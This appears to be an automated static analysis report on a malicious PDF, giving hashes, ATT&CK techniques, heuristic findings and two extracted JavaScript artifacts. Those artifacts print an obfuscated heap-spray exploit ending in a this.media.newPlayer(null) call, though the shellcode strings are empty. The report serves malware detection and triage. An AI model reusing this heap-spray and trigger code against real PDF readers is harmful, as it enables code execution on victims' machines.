Malicious PDF — malware analysis report

Static analysis result for SHA-256 81c17e87c050790c…

MALICIOUS

PDF

1.4 KB First seen: 2026-05-10
MD5: 601db4fd05dc7726cc780692fdb4e81c SHA-1: b4a1949244ea55321238b21a0f8720344d2be185 SHA-256: 81c17e87c050790ce0b60b26e651f6e669430db5ea43d1f2c36581808a97b511
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF file contains embedded JavaScript that utilizes the unescape function and performs a heap spray. This behavior is indicative of an exploit attempting to gain control of the execution flow, likely to download and execute a secondary payload. The ML classifier strongly suggests maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb = unescape("");
var yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM = unescape("");
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x167 817 bytes
SHA-256: 9ca00b695994f28bb6b188c1e2be1fb8592d994c57d134a17a342b371c7dbed1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb = unescape("");
var yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM = unescape("");

while(yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM.length <= 32768) yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM+=yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM;
yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM=yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM.substring(0,32768 - WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb.length);

memory=new Array();

for(i=0;i<0x2001;) {
	memory[i]= yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM + WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb;
	i++;
}
try {var obj = this.media;obj["new"+"Player"](null);} catch(e) {}
javascript_obj0006_001.js pdf-javascript-stream PDF /JS object 6 at offset 0x189 1041 bytes
SHA-256: e2622ea05bacdc49e8573d407ecba12d325fe9e514c79efe6974d47b87cf3dc5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb = unescape("");
var yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM = unescape("");

while(yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM.length <= 32768) yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM+=yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM;
yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM=yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM.substring(0,32768 - WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb.length);

memory=new Array();

for(i=0;i<0x2001;) {
	memory[i]= yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM + WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb;
	i++;
}
try {var obj = this.media;obj["new"+"Player"](null);} catch(e) {}

endstream 
endobj xref
0 7
0000000000 65535 f 
0000000015 00000 n 
0000000100 00000 n 
0000000297 00000 n 
0000000148 00000 n 
0000000207 00000 n 
0000000359 00000 n 
trailer

<<
/Root 1 0 R
/Size 7
>>
startxref
1227
%%EOF

Open this report in the interactive analyzer, or submit your own file for analysis.